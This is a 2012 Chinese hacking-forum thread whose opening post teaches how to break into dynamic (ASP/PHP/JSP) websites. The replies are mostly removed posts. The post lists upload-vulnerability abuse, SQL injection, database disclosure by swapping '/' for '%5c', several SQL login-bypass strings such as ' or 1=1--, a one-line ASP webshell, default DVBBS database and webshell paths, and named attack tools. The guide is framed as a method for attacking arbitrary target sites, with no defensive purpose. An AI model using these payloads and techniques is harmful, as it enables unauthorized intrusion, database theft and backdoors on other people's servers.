查看: 1830|回复: 22

入侵指定网站的思路

[复制链接]
发表于 2012-4-26 07:49:15 | 显示全部楼层 |阅读模式
首先,观察指定网站。
入侵指定网站是需要条件的:
要先观察这个网站是动态还是静态的。
首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点
如果是静态的(.htm或html),一般是不会成功的。
如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。

Quote:
以下是入侵网站常用方法:
1.上传漏洞
如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传. 

2.注入漏洞
字符过滤不严造成的

3.暴库:把二级目录中间的/换成%5c 
 
 
4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
 ’or’’=’ " or "a"="a   ’) or (’a’=’a   ") or ("a"="a  or 1=1--  ’ or ’a’=’a
5.社会工程学。这个我们都知道吧。就是猜解。
 
6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 (数据库必需得是ASP或ASA的后缀)
  
7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.
比如:默认数据库,默认后台地址,默认管理员帐号密码等
   
8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡 明小子

chenjian 该用户已被删除
发表于 2012-4-26 12:11:50 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
666111 该用户已被删除
发表于 2012-4-27 06:02:14 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2012-4-27 07:22:39 | 显示全部楼层
彪悍的人生不需要解释。  
chenlyun1314 该用户已被删除
发表于 2012-4-27 15:43:44 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
5566 该用户已被删除
发表于 2012-4-28 16:09:27 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
xinlang 该用户已被删除
发表于 2012-4-28 17:02:08 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
ak69v 该用户已被删除
发表于 2012-5-1 00:02:59 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
hushirong 该用户已被删除
发表于 2012-5-4 01:14:10 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
aawqs 该用户已被删除
发表于 2012-5-4 11:09:29 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
高级模式
B Color Image Link Quote Code Smilies

本版积分规则